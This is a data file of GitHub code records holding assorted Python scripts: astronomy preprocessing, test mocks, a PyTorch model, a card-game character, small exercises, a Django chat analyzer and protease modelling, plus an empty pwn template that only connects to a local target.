header[\"FILTER\"] = FILTERNAME\r\n if add_object_name:\r\n header[\"OBJECT\"] = OBSOBJ\r\n 
header[\"OBSERVER\"] = \", \".join(OBSERVERS.upper().split('_'))\r\n\r\n\r\ndef convert_datetime_fits(metadata_datetime):\r\n date, time = metadata_datetime.split(' ')\r\n date = '-'.join(date.split(':'))\r\n return date + 'T' + time\r\n\r\n\r\ndef convert_datetime_filename(fits_datetime):\r\n date, time = fits_datetime.split('T')\r\n date = ''.join(date.split('-'))\r\n time = ''.join(time.split(':'))\r\n return date + 'T' + time\r\n\r\n\r\ndef main():\r\n for filename in os.listdir(\"./raw/\"):\r\n filepath = RAW_DIR + filename\r\n metadata = get_metadata(filepath)\r\n fitsname = get_fits_name(metadata, False, False, False)\r\n fitsfile = fits.PrimaryHDU(data=get_raw_data(filepath))\r\n set_fits_header(fitsfile.header, metadata, False, False, False)\r\n fitsfile.writeto(FITS_DIR + fitsname, overwrite=True)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"slhshamloo/astro2023","sub_path":"Conversion/astro_preprocess.py","file_name":"astro_preprocess.py","file_ext":"py","file_size_in_byte":3657,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"7950875116","text":"from unittest.mock import mock_open, patch, MagicMock\n\nfrom apluslms_yamlidator.utils.yaml import load as yaml_loads\n\n\ndef _mock_open(*args, **kwargs):\n mock = mock_open(*args, **kwargs)\n def get_written_content():\n mock.return_value.write.assert_called()\n return ''.join(a[0] for a, kw in mock.return_value.write.call_args_list)\n mock.get_written_content = get_written_content\n mock.get_written_yaml = lambda: yaml_loads(get_written_content())\n return mock\n\n\nclass VFS(dict):\n \"\"\"\n mock_files creates a dictionary containing all open files in it's\n context. The dictionary works as a virtual filesystem (VFS) without\n any paths, thus all base filenames needs to be unique. 
The VFS is\n    returned by the context manager.\n\n    Contents returned via open call can be passed in the `files` dictionary.\n\n    with mock_files() as vfs:\n        # To check if file was written to:\n        vfs['filename'].return_value.write.called\n        # To check contents:\n        vfs['filename.txt'].get_written_content() == \"hello!\"\n        # To load yaml data:\n        vfs['filename.yml'].get_written_yaml() == {'hello': 'world'}\n\n        # VFS also contains mocks for listdir and isfile\n        vfs.mock_isfile.assert_called()\n        vfs.mock_listdir.assert_called()\n    \"\"\"\n    def __init__(self, files):\n        super().__init__(\n            (fn.rsplit('/', 1)[-1], _mock_open(read_data=data))\n            for fn, data in files.items()\n        )\n        self.mock_listdir = MagicMock(side_effect=lambda x: list(self))\n        self.mock_isfile = MagicMock(side_effect=self.__contains__)\n        self.mock_exists = MagicMock(side_effect=self.__contains__)\n\n    def __contains__(self, fn):\n        fn = fn.rsplit('/', 1)[-1]\n        return super().__contains__(fn)\n\n    def mock_open(self, fn, mode='r', *args, **kwargs):\n        basename = fn.rsplit('/', 1)[-1]\n        try:\n            return self[basename](fn, mode, *args, **kwargs)\n        except KeyError:\n            if 'r' in mode:\n                raise FileNotFoundError(fn)\n            self[basename] = m = _mock_open()\n            return m(fn, mode, *args, **kwargs)\n","repo_name":"apluslms/roman","sub_path":"tests/mock_files.py","file_name":"mock_files.py","file_ext":"py","file_size_in_byte":2189,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"72870493662","text":"import torch\nfrom torch import nn\nimport torch.npu\nimport os\nNPU_CALCULATE_DEVICE = 0\nif os.getenv('NPU_CALCULATE_DEVICE') and str.isdigit(os.getenv('NPU_CALCULATE_DEVICE')):\n    NPU_CALCULATE_DEVICE = int(os.getenv('NPU_CALCULATE_DEVICE'))\nif torch.npu.current_device() != NPU_CALCULATE_DEVICE:\n    torch.npu.set_device(f'npu:{NPU_CALCULATE_DEVICE}')\n\n\nclass FM(nn.Module):\n    def __init__(self, cate_fea_uniques, num_fea_size=0, emb_size=8,):\n        '''\n        :param cate_fea_uniques:\n        :param num_fea_size: number of numeric (i.e. continuous) features\n        :param emb_size: embed_dim\n        '''\n        super(FM, self).__init__()\n        self.cate_fea_size = len(cate_fea_uniques)\n        self.num_fea_size = num_fea_size\n\n        # first-order term for dense features\n        if self.num_fea_size != 0:\n            self.fm_1st_order_dense = nn.Linear(self.num_fea_size, 1)\n\n        # first-order term for sparse features\n        self.fm_1st_order_sparse_emb = nn.ModuleList([\n            nn.Embedding(voc_size, 1) for voc_size in cate_fea_uniques\n        ])\n\n        # second-order embeddings for sparse features\n        self.fm_2nd_order_sparse_emb = nn.ModuleList([\n            nn.Embedding(voc_size, emb_size) for voc_size in cate_fea_uniques\n        ])\n        self.sigmoid = nn.Sigmoid()\n\n    def forward(self, X_sparse, X_dense=None):\n        \"\"\"\n        X_sparse: sparse_feature [batch_size, sparse_feature_num]\n        X_dense: dense_feature [batch_size, dense_feature_num]\n        \"\"\"\n        \"\"\"FM part\"\"\"\n        # first order: combines the first-order terms of sparse and dense features\n        fm_1st_sparse_res = [emb(X_sparse[:, i].unsqueeze(1)).view(-1, 1)\n                             for i, emb in enumerate(self.fm_1st_order_sparse_emb)] # embed each sparse feature into one dimension\n        fm_1st_sparse_res = torch.cat(fm_1st_sparse_res, dim=1) # torch.Size([2, 26])\n        fm_1st_sparse_res = torch.sum(fm_1st_sparse_res, 1, keepdim=True) # [bs, 1] sum the per-feature terms into a single dimension\n\n        if X_dense is not None:\n            fm_1st_dense_res = self.fm_1st_order_dense(X_dense) # project dense features down to one dimension\n            fm_1st_part = fm_1st_sparse_res + fm_1st_dense_res\n        else:\n            fm_1st_part = fm_1st_sparse_res # [bs, 1]\n\n        # second order\n        fm_2nd_order_res = [emb(X_sparse[:, i].unsqueeze(1)) for i, emb in enumerate(self.fm_2nd_order_sparse_emb)]\n        fm_2nd_concat_1d = torch.cat(fm_2nd_order_res, dim=1) # batch_size, 
sparse_feature_nums, emb_size\n        # print(fm_2nd_concat_1d.size()) # torch.Size([2, 26, 8])\n\n        # sum first, then square\n        sum_embed = torch.sum(fm_2nd_concat_1d, 1) # batch_size, emb_size\n        square_sum_embed = sum_embed * sum_embed # batch_size, emb_size\n\n        # square first, then sum\n        square_embed = fm_2nd_concat_1d * fm_2nd_concat_1d # batch_size, sparse_feature_num, emb_size]\n        sum_square_embed = torch.sum(square_embed, 1) # batch_size, emb_size\n\n        # subtract and divide by 2\n        sub = square_sum_embed - sum_square_embed\n        sub = sub * 0.5 # batch_size, emb_size\n\n        # sum over the embedding dimension\n        fm_2nd_part = torch.sum(sub, 1, keepdim=True) # batch_size, 1\n\n        out = fm_1st_part + fm_2nd_part # batch_size, 1\n        out = self.sigmoid(out)\n        return out\n","repo_name":"Ascend/ModelZoo-PyTorch","sub_path":"PyTorch/dev/others/Widedeep_ID2866_for_PyTorch/FM/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":3263,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"7"}
+{"seq_id":"5201834995","text":"from genius_invocation.card.character.import_head import *\n\nclass Thrust(NormalAttack):\n# Thrust\n    id = 23011\n    name = 'Thrust'\n    name_ch = '突刺'\n    type: SkillType = SkillType.NORMAL_ATTACK\n\n    # damage\n    damage_type: SkillType = SkillType.NORMAL_ATTACK\n    main_damage_element: ElementType = ElementType.PHYSICAL\n    main_damage: int = 2\n    piercing_damage: int = 0\n\n    # cost\n    cost = [\n        {\n            'cost_num': 1,\n            'cost_type': CostType.PYRO\n        },\n        {\n            'cost_num': 2,\n            'cost_type': CostType.BLACK\n        }\n    ]\n    energy_cost: int = 0\n    energy_gain: int = 1\n\n    def __init__(self, from_character: 'Character'):\n        super().__init__(from_character)\n\n    def on_call(self, game: 'GeniusGame'):\n        super().on_call(game)\n        # resolve damage\n        self.resolve_damage(game)\n        # gain energy\n        self.gain_energy(game)\n        # after skill\n        game.manager.invoke(EventType.AFTER_USE_SKILL, game)\n\n\nclass Prowl(ElementalSkill):\n    # Prowl\n    name = 'Prowl'\n    name_ch = '伺机而动'\n    id = 23012\n\n    type: SkillType = SkillType.ELEMENTAL_SKILL\n\n    # damage\n    damage_type: SkillType = SkillType.ELEMENTAL_SKILL\n    main_damage_element: ElementType = ElementType.PYRO\n    main_damage: int = 1\n    piercing_damage: int = 0\n\n    # cost\n    cost = [\n        {\n            'cost_num': 3,\n            'cost_type': CostType.PYRO\n        }\n    ]\n    energy_cost: int = 0\n    energy_gain: int = 1\n\n    def __init__(self, from_character: 'Character'):\n        super().__init__(from_character)\n\n    def on_call(self, game: 'GeniusGame'):\n        super().on_call(game)\n        self.resolve_damage(game)\n        self.add_status(game, Stealth)\n        self.gain_energy(game)\n        game.manager.invoke(EventType.AFTER_USE_SKILL, game)\n\n\nclass Blade_Ablastion(ElementalBurst):\n    # Blade Ablastion\n    name = 'Blade Ablastion'\n    name_ch = '焚毁之风'\n    id = 23013\n    type = SkillType.ELEMENTAL_BURST\n\n    damage_type: SkillType = SkillType.ELEMENTAL_BURST\n    main_damage_element: ElementType = ElementType.PYRO\n    main_damage: int = 5\n    piercing_damage: int = 0\n\n    cost =[{\n        'cost_num': 3,\n        'cost_type': CostType.PYRO\n    }]\n    energy_cost = 2\n    energy_gain = 0\n\n    def on_call(self, game:'GeniusGame'):\n        super().on_call(game)\n        self.consume_energy(game)\n        self.resolve_damage(game)\n        game.manager.invoke(EventType.AFTER_USE_SKILL, game)\n\n\nclass Stealth(Status):\n    # Stealth\n    name = 'Stealth'\n    name_ch = '潜行'\n\n    def __init__(self, game: 'GeniusGame', from_player: 'GeniusPlayer', from_character: 'Character'):\n        super().__init__(game, from_player, from_character)\n        self.max_usage = 2\n        self.usage = 2\n        if self.from_character.talent:\n            self.max_usage = 3\n            self.usage = 3\n\n        self.current_usage = self.usage\n\n    def update(self):\n        if 
self.from_character.talent:\n            self.max_usage = 3\n            self.usage = 3\n        self.current_usage = max(self.current_usage, self.usage)\n\n    def on_execute_dmg(self, game: 'GeniusGame'):\n        if game.current_damage.damage_to == self.from_character:\n            if game.current_damage.main_damage_element != ElementType.PIERCING:\n                if game.current_damage.main_damage > 0:\n                    game.current_damage.main_damage -= 1\n                    self.current_usage -= 1\n                    if self.current_usage <=0:\n                        self.on_destroy(game)\n\n    def on_dmg_add(self, game: 'GeniusGame'):\n        if game.current_damage.damage_from == self.from_character:\n            game.current_damage.main_damage += 1\n            self.current_usage -= 1\n            if self.current_usage <=0:\n                self.on_destroy(game)\n\n    def infusion(self, game:'GeniusGame'):\n        if self.from_character.talent:\n            if self.from_character == game.current_damage.damage_from:\n                if game.current_damage.main_damage_element == ElementType.PHYSICAL:\n                    game.current_damage.main_damage_element = ElementType.PYRO\n    \n    def update_listener_list(self):\n        self.listeners = [\n            (EventType.EXECUTE_DAMAGE, ZoneType.CHARACTER_ZONE, self.on_execute_dmg),\n            (EventType.DAMAGE_ADD, ZoneType.CHARACTER_ZONE, self.on_dmg_add)\n        ]\n        if self.from_character.talent:\n            self.listeners.append((EventType.INFUSION, ZoneType.CHARACTER_ZONE, self.infusion))\n    \nclass Fatui_Pyro_Agent(Character):\n    name = 'Fatui Pyro Agent'\n    name_ch = '愚人众·火之债务处理人'\n    id = 2301\n    element: ElementType = ElementType.PYRO\n    weapon_type: WeaponType = WeaponType.OTHER\n    country: CountryType = CountryType.FATUI\n    init_health_point: int = 10\n    max_health_point: int = 10\n    skill_list = [Thrust, Prowl, Blade_Ablastion]\n    max_power = 2\n    \n    def init_state(self, game: 'GeniusGame'):\n        assert self.character_zone.has_entity(Stealth) is None\n        status = Stealth(game, self.from_player, self)\n        self.character_zone.add_entity(status)\n\n    def __init__(self, game: 'GeniusGame', zone: 'CharacterZone', from_player: 'GeniusPlayer', index:int, from_character = None, talent = False):\n        super().__init__(game, zone, from_player, index, from_character)\n        self.talent = talent\n        self.power = 0\n        self.talent_skill = self.skills[1]\n\n    def listen_talent_events(self, game: 'GeniusGame'):\n        status = self.character_zone.has_entity(Stealth)\n        if status is not None:\n            status.listen_event(game, EventType.INFUSION, ZoneType.CHARACTER_ZONE, status.infusion)","repo_name":"flick-ai/Genius-Invokation","sub_path":"genius_invocation/card/character/characters/Fatui_Pyro_Agent.py","file_name":"Fatui_Pyro_Agent.py","file_ext":"py","file_size_in_byte":5752,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"7"}
+{"seq_id":"23195826041","text":"#!/usr/bin/python3\ndef element_at(my_list, idx):\n    \"\"\"retrieves the element at an index\n\n    Args:\n        my_list: list variable\n        idx: index\n\n    Returns:\n        The element at the index\n    \"\"\"\n    if (idx < 0):\n        return None\n    elif (idx >= len(my_list)):\n        return None\n    else:\n        element = my_list[idx]\n        return element\n\n\nif __name__ == \"__main__\":\n    my_list = [1, 2, 3, 4, 5]\n    idx = 3\n    print(\"Element at index {:d} is {}\".format(idx, element_at(my_list, idx)))\n","repo_name":"johnolamide/alx-higher_level_programming","sub_path":"0x03-python-data_structures/1-element_at.py","file_name":"1-element_at.py","file_ext":"py","file_size_in_byte":510,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"12201155969","text":"import random\r\ncpu_s = 0\r\nuser_s = 0\r\n\r\nwhile cpu_s < 4 and user_s < 4 :\r\n    
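# CPU draw: 1 = stone, 2 = paper, 3 = scissors\r\n    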
\n a = random.randint (1 , 3)\n if a == 1 :\n cpu_ch = \"stone\"\n\n elif a == 2 :\n cpu_ch = \"paper\"\n\n elif a == 3 :\n cpu_ch = \"scissors\"\n\n user_ch = input(\"Please write one between stone paper scissors: \")\n\n print(\"💻 :\", cpu_ch ,\"and 👤 :\", user_ch)\n\n if cpu_ch == \"stone\" and user_ch == \"paper\":\n user_s = user_s + 1 \n\n elif cpu_ch == \"stone\" and user_ch == \"scissors\":\n cpu_s = cpu_s + 1\n\n elif cpu_ch == \"paper\" and user_ch == \"stone\":\n cpu_s = cpu_s + 1\n\n elif cpu_ch == \"paper\" and user_ch == \"scissors\":\n user_s = user_s + 1 \n\n elif cpu_ch == \"scissors\" and user_ch == \"stone\":\n user_s = user_s + 1 \n\n elif cpu_ch == \"scissors\" and user_ch == \"paper\":\n cpu_s = cpu_s + 1\n\n print(\"💻 :\", cpu_s, \"vs 👤 :\", user_s)\n \n\n\n\n\n","repo_name":"codeoprcode/Practice-2","sub_path":"2-Stone Paper Scissors.py","file_name":"2-Stone Paper Scissors.py","file_ext":"py","file_size_in_byte":929,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"5059585106","text":"from zio import *\n\n\nLOCAL = True\n\nif LOCAL:\n target = './filename'\nelse:\n target = ('127.0.0.1',10001)\n\nio = zio(target, timeout=10000, print_read=COLORED(RAW, 'red'), print_write=COLORED(RAW, 'green'))\n\n\ndef main():\n io.interact()\n\nif __name__ =='__main__':\n main()\n","repo_name":"threezerobravoteam/PwnableLog","sub_path":"scripts/pwn_template_zio.py","file_name":"pwn_template_zio.py","file_ext":"py","file_size_in_byte":279,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"71144266784","text":"from msilib.schema import File\n\nfrom django.shortcuts import render\nfrom django.http import HttpResponse\nfrom django.core.files import File\nfrom .import forms\nimport re \nimport pandas as pd \nfrom .utils import get_plot, get_plot_bar\n\nfrom Text_Preparation import text_preparation\n# Create your views here.\ndef home(request):\n if request.method =='POST':\n uploaded_file = forms.File(request.POST,request.FILES)\n if uploaded_file.is_valid():\n # Getting file data directly from form field\n file = request.FILES.get('upload_file').read() \n #Getting whole dataframe\n df,user= text_preparation.TextPreparation().read_file(str(file))\n #creating the attribute of the object of function home\n home.dataframe = df\n \n # print(home.__dict__)\n res = render(request,'info.html',{'df':df,'user':user})\n return res \n else:\n form =forms.File()\n res = render(request,'index.html',{'form':form})\n return res\n\n\n\n\n# Analysis for particular user\ndef Analyzer(request):\n \n if request.method=='POST':\n selected_user = request.POST.get('user')\n num_of_msg,name,user_messages,links= text_preparation.TextPreparation().GetParticular(selected_user)\n # text_preparation.TextPreparation().GetParticular(selected_user)\n print(selected_user)\n print(num_of_msg,name)\n \n # print(home.__dict__)\n # Calculate the number of words \n total_words = text_preparation.TextPreparation().Total_words(user_messages)\n # show visual for most active user\n active_name,count = text_preparation.TextPreparation().get_visualization_for_most_active()\n chart = get_plot(active_name,count)\n #show most active month\n month, msg = text_preparation.TextPreparation().get_most_active_month()\n chart2 = get_plot_bar(month,msg)\n #presenting analysis of most active days\n active_day_x,active_day_y =text_preparation.TextPreparation().most_active_days()\n chart3 = get_plot(active_day_x,active_day_y)\n 
res = render(request,'analysis.html',{'msg':num_of_msg,'name':name,'user_messages':user_messages,'total_words':total_words,'links':links,'chart':chart,'chart2':chart2,\n 'chart3':chart3})\n return res","repo_name":"Aditya9329/WhatsAppChatAnalysis","sub_path":"WhatsApp/Analysis/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2338,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"24507168908","text":"from __future__ import unicode_literals\nimport numpy as np\nimport matplotlib\nmatplotlib.rcParams['text.usetex'] = True\nmatplotlib.rcParams['text.latex.unicode'] = True\nimport matplotlib.pyplot as plt\n\nimport pandas as pd\n\nimport argparse\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--input_file\", help=\"input txt file (ex. prob_volt.data\")\nparser.add_argument(\"--exp_file\", help=\"experimental data txt file (ex. prob_volt.data)\")\nparser.add_argument(\"--bp\", help=\"activate BP probes\", action='store_true')\nparser.add_argument(\"--plot\", help=\"activate plot\", action='store_true')\nargs = parser.parse_args()\n\ninput_file = args.input_file\n\n# Import Dataset\ndf = pd.read_csv(input_file, sep='\\s+', engine='python', skiprows=[1])\nkeys = df.columns.values.tolist()\n#print (\"keys=\", len(keys))\n\n# print (df['potential'])\n# df['U'] = df['potential'] - df['potential'][0]\n# print (df['U'])\n\n# Import Exp Data\nexp = pd.read_csv(args.exp_file, sep='\\s+', engine='python', skiprows=1)\nkeys = exp.columns.values.tolist()\n# print (keys)\n# print (exp['Ucoil1'])\n\nindex_max = 8\nif args.bp:\n index_max = 15\n\nUprobes = [] \noutput=\"\"\nheader=\"\"\nfor i in range(1,index_max):\n numkey = \"U%d\" % i\n Uprobes.append(\"Ucoil%d\" % i)\n exp[numkey] = exp.apply(lambda row: df['potential'][i] - df['potential'][i-1], axis=1)\n # print (numkey, (df['potential'][i] - df['potential'][i-1]))\n output += \"%s \" % str(df['potential'][i] - df['potential'][i-1])\n header += \"%s[V]\\t\" % numkey\nprint (header)\nprint (output)\n\nif args.plot: \n ax = plt.gca()\n # loop over key\n for key in Uprobes:\n numkey = key.replace(\"coil\",'')\n #print (key, numkey)\n if key in keys:\n exp.plot(x='Time', y=key, ax=ax)\n color = ax.get_lines()[-1].get_color() \n # print (\"color=\", color)\n exp.plot(x='Time', y=numkey, style=\"^\", markevery=800, color=color, ax=ax) #\n else:\n print( \"unknown key: %s\" % args.plot_vs_time )\n print( \"valid keys: \", keys )\n exit(1)\n plt.show()\n","repo_name":"feelpp/book.hifimagnet","sub_path":"docs/docs/modules/appendix/assets/examples/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2067,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"7"} +{"seq_id":"3016374094","text":"\"\"\"\nThis module provides the API functionality\n\"\"\"\n\nfrom flask import Flask\nfrom flask_mysqldb import MySQL\nimport json\nfrom datetime import datetime\nfrom flask import request\nimport time\nimport config\n\n# App Configuration\napp = Flask(__name__)\n\napp.config['MYSQL_USER'] = config.USER\napp.config['MYSQL_PASSWORD'] = config.PASSWORD\napp.config['MYSQL_HOST'] = config.HOST\napp.config['MYSQL_DB'] = config.DATABASE\napp.config['MYSQL_CURSORCLASS'] = 'DictCursor'\n\nmysql = MySQL(app)\n\n\ndef sql_condition():\n \"\"\"\n Returns the SQL condition corresponding to the request query string\n \"\"\"\n\n # Get parameters from query string\n args = request.args\n for k, v in args.items():\n print(f\"arg [{k}] = 
[{v}]\")\n\n # Construct a list of SQL conditions based on query string parameters\n conditions = []\n if \"from\" in args:\n value = args[\"from\"]\n dt_value = datetime.strptime(value, '%Y-%m-%d_%H:%M:%S')\n unixtime = int(time.mktime(dt_value.timetuple()) * 1000)\n print('converted', value, dt_value, unixtime)\n conditions.append(f\"(interval_start_timestamp >= {unixtime})\")\n if \"to\" in args:\n value = args[\"to\"]\n dt_value = datetime.strptime(value, '%Y-%m-%d_%H:%M:%S')\n unixtime = int(time.mktime(dt_value.timetuple()) * 1000)\n print('converted', value, dt_value, unixtime)\n conditions.append(f\"(interval_end_timestamp <= {unixtime})\")\n if \"interval\" in args:\n value = args[\"interval\"]\n conditions.append(f\"(`interval` = '{value}')\")\n\n # Construct the final condition (join the conditions in the list with AND)\n condition = \"\" if not conditions else \" WHERE \"+\" AND \".join(conditions)\n print(\"condition\", condition)\n\n # Return the final condition\n return condition\n\n\ndef db_results(sql):\n \"\"\"\n Runs the provided sql statement, and fetches the results in JSON format\n \"\"\"\n\n # Execute the SQL on the database and fetch the results\n cur = mysql.connection.cursor()\n cur.execute(sql)\n results = cur.fetchall()\n\n # Create output_rows list (transformed results for output)\n output_rows = []\n for result in results:\n result['interval_start_timestamp'] = datetime.fromtimestamp(\n result['interval_start_timestamp']/1000).strftime('%Y-%m-%d %H:%M:%S')\n result['interval_end_timestamp'] = datetime.fromtimestamp(\n result['interval_end_timestamp']/1000).strftime('%Y-%m-%d %H:%M:%S')\n output_rows.append(result)\n\n # Return json (based on transformed results)\n return json.dumps(output_rows)\n\n\n@app.route('/kpi1/', methods=['GET'])\ndef get_kpi1():\n \"\"\"\n Queries kpi1 database table and returns results in JSON format\n \"\"\"\n\n # Construct the SQL statement to run on the database\n sql = f'''\n SELECT * \n FROM kpi1 \n {sql_condition()}\n ORDER BY \n `interval`,\n interval_start_timestamp, \n interval_end_timestamp, \n total_bytes desc,\n service_id desc\n '''\n print(\"sql\", sql)\n\n # Run the SQL statement on the database and return results\n return db_results(sql)\n\n\n@app.route('/kpi2/', methods=['GET'])\ndef get_kpi2():\n \"\"\"\n Queries kpi2 database table and returns results in JSON format\n \"\"\"\n\n # Construct the SQL statement to run on the database\n sql = f'''\n SELECT * \n FROM kpi2\n {sql_condition()}\n ORDER BY \n `interval`,\n interval_start_timestamp, \n interval_end_timestamp, \n number_of_unique_users desc,\n cell_id desc\n '''\n print(\"sql\", sql)\n\n # Run the SQL statement on the database and return results\n return db_results(sql)\n","repo_name":"sgioldasis/pyspark-analysis-api","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3673,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"70503391264","text":"from __future__ import print_function, division\nimport logging\nlogging.basicConfig(\n level=logging.INFO,\n format=\"%(asctime)s.%(msecs).03d %(name)s %(message)s\",\n datefmt='%Y-%m-%dT%H:%M:%S'\n)\n\nimport pandas\n\nimport numpy\n\nimport itertools\n\nimport jug\n\nfrom itertools import product, izip, chain\ndef dict_product(iterable_dict):\n return (dict(izip(iterable_dict, x)) for x in product(*iterable_dict.itervalues()))\n\n@jug.TaskGenerator\ndef model_cv_predictions(protease, parameters):\n import sklearn.cross_validation as 
cross_validation\n from sklearn.metrics import mean_squared_error\n import protease_experimental_analysis.sequence_protease_susceptibility as sequence_protease_susceptibility\n\n import data_constk_161218_rd1234\n import pandas as pd\n import numpy as np\n\n ssm_data = pandas.DataFrame.from_dict({\n \"sequence\" : map(str.strip, open('160924_grocklin_ssm2_myseqs').readlines())\n })\n\n ssm_data[\"pred_sequence\"] = [\"GGGSASHM\" + x + \"LEGGGSEQ\" + ('Z' * (46 - len(x))) for x in ssm_data.sequence.values]\n #newbg=pd.read_csv('ssm_mut_pred_logistic_upweight10_161224',delim_whitespace=True)\n bigtable_prot=pd.read_csv('big_ssm2_nextseq_table_known_frac_named',delim_whitespace=True,header=None)\n bigtable_prot=bigtable_prot[[0,1]]\n bigtable_prot.columns=['name','sequence']\n ssm=pd.merge(left=bigtable_prot, right=ssm_data,on='sequence',how='inner')\n\n ssm_lines=\"\"\"EEHEE_rd3_0037.pdb TTIKVNGQEYTVPLSPEQAAKAAKKRWPDYEVQIHGNTVKVTR\nEEHEE_rd3_1498.pdb GTLHLNGVTVKVPSLEKAIKAAKKFAKKYNLEVQVHGNTVHVH\nEEHEE_rd3_1702.pdb TTIHVGDLTLKYDNPKKAYEIAKKLAKKYNLTVTIKNGKITVT\nEEHEE_rd3_1716.pdb TEVHLGDIKLKYPNPEQAKKAAEKLAQKYNLTWTVIGDYVKIE\nEHEE_0882.pdb QETIEVEDEEEARRVAKELRKKGYEVKIERRGNKWHVHRT\nEHEE_rd2_0005.pdb TTRYRFTDEEEARRAAKEWARRGYQVHVTQNGTYWEVEVR\nEHEE_rd3_0015.pdb KTQYEYDTKEEAQKAYEKFKKQGIPVTITQKNGKWFVQVE\nHEEH_rd2_0779.pdb TLDEARELVERAKKEGTGVDVNGQRFEDWREAERWVREQEKNK\nHEEH_rd3_0223.pdb TIDEIIKALEQAVKDNKPIQVGNYTVTSADEAEKLAKKLKKEY\nHEEH_rd3_0726.pdb TELKKKLEEALKKGEEVRVKFNGIEIRITSEDAARKAVELLEK\nHEEH_rd3_0872.pdb TWQDLVKIAEKALEKGEPITINGITVTTKEQAKQAIEYLKKAY\nHHH_0142.pdb RKWEEIAERLREEFNINPEEAREAVEKAGGNEEEARRIVKKRL\nHHH_rd2_0134.pdb SKDEAQREAERAIRSGNKEEARRILEEAGYSPEQAERIIRKLG\nHHH_rd3_0138.pdb ERRKIEEIAKKLYQSGNPEAARRFLRKAGISEEEIERILQKAG\nPin1 MADEEKLPPGWEKRMSRSSGRVYYFNHITNASQWERPSG\nhYAP65 FEIPDDVPLPAGWEMAKTSSGQRYFKNHIDQTTTWQDPRKAMLSQM\nvillin LSDEDFKAVFGMTRSAFANLPLWKQQNLKKEKGLF\"\"\".split('\\n')\n wt_seqs={}\n for line in ssm_lines:\n wt_seqs[line.split()[0]] = line.split()[1]\n\n def wt(x):\n if '_wt' in x or x.split('_')[-1][-4:] in ['.pdb','AP65','llin','Pin1']:\n return x\n else:\n return '_'.join(x.split('_')[0:-1])\n ssm['my_wt'] = ssm['name'].map(wt)\n\n def delta_pred_vs_wt(wts, preds):\n wt_preds=dict(zip(wts, preds))\n return [wt_preds[wt] - pred for wt, pred in zip(wts, preds)]\n\n\n\n\n\n\n scramble_data = data_constk_161218_rd1234.scramble_data\n \n full_data = data_constk_161218_rd1234.full_df\n full_data[\"full_sequence\"] = \"GGGSASHM\" + full_data[\"sequence\"] + \"LEGGGSEQ\"\n max_len=max([len(x) for x in full_data[\"full_sequence\"].values])\n full_data[\"full_sequence\"] = [old_seq + ('Z' * (max_len - len(old_seq))) for old_seq in full_data[\"full_sequence\"].values]\n\n\n\n full_data_byprot = {\n t : full_data[full_data[\"protease\"] == t]\n for t in (protease,)\n }\n\n prottest={}\n\n full_data_byprot[protease]['prottest'] = ['prottest' in x for x in full_data_byprot[protease]['name']]\n prottest[protease] = full_data_byprot[protease].query('prottest == True')\n prottest[protease]['parent'] = [x.split('_prottest')[0] for x in prottest[protease]['name']]\n prottest[protease] = pd.merge(left=prottest[protease][['name','parent','ec50','full_sequence']],\n right=full_data_byprot[protease][['name','ec50','full_sequence']],\n left_on='parent',right_on='name',how='inner')\n prottest[protease]['delta_ec50'] = prottest[protease]['ec50_x'] - prottest[protease]['ec50_y']\n\n\n data = scramble_data.query(\"round != 'pdb' and protease == '%s'\" % protease).copy()\n model = 
sequence_protease_susceptibility.CenterLimitedPSSMModel(**dict(parameters))\n\n \n model.fit(list(data[\"full_sequence\"].values), data[\"ec50\"].values)\n \n ssm_preds = model.predict(list(ssm['pred_sequence']))\n delta_pred = delta_pred_vs_wt(ssm['my_wt'].values, ssm_preds)\n \n extras = {}\n extras['min_delta_vs_pred'] = min(delta_pred)\n extras['max_delta_vs_pred'] = max(delta_pred)\n extras['delta_pred'] = delta_pred\n extras['ssm_pred'] = ssm_preds\n\n prottest_pred_delta = (model.predict(list(prottest[protease]['full_sequence_x'])) - \n model.predict(list(prottest[protease]['full_sequence_y'])))\n\n extras['prottest_mse']= mean_squared_error(prottest_pred_delta, prottest[protease]['delta_ec50'])\n extras['prottest_R2'] = np.corrcoef(prottest_pred_delta, prottest[protease]['delta_ec50'])[0][1]**2.0\n extras['prottest_slope'] = np.polyfit(prottest_pred_delta, prottest[protease]['delta_ec50'], 1)[0]\n extras['fit_coeffs_'] = model.fit_coeffs_\n extras['cen_to_flank'] = max(abs(model.fit_coeffs_['seq_weights'][0:-1])) / max(abs(np.ravel(model.fit_coeffs_['weights'][0:-1,0:-1])))\n\n data[\"fit_pred_ec50\"] = model.predict(list(data[\"full_sequence\"].values))\n data[\"pred_ec50\"] = cross_validation.cross_val_predict(\n model, data[\"full_sequence\"], data[\"ec50\"], )\n\n return (data, extras)\n\nparam_space = {\n #alpha_center\" : numpy.exp(numpy.array([-6,-5.5,-5,-4.5,-4,-3.5])),\n \"alpha_center\" : numpy.exp(numpy.array([-15])),\n #\"alpha_flank\" : numpy.exp(numpy.array([-8,-7,-6.5,-6,-5.5,-5,-4.5,-4,-3.5,-3])),\n \"alpha_flank\" : numpy.exp(numpy.array([-15])),\n \"max_data_upweight\" : (1.0,),\n \"init_tot_l\" : (20,),\n \"init_max_sumweight\" : (10,),\n \"error_upper_lim\": (10,),\n \"flanking_window\": (1,2,3,4),\n}\n\nproteases = [\"tryp\",\"chymo\"]\n#proteases=[\"chymo\",]\nparameter_sets = [frozenset(d.items()) for d in 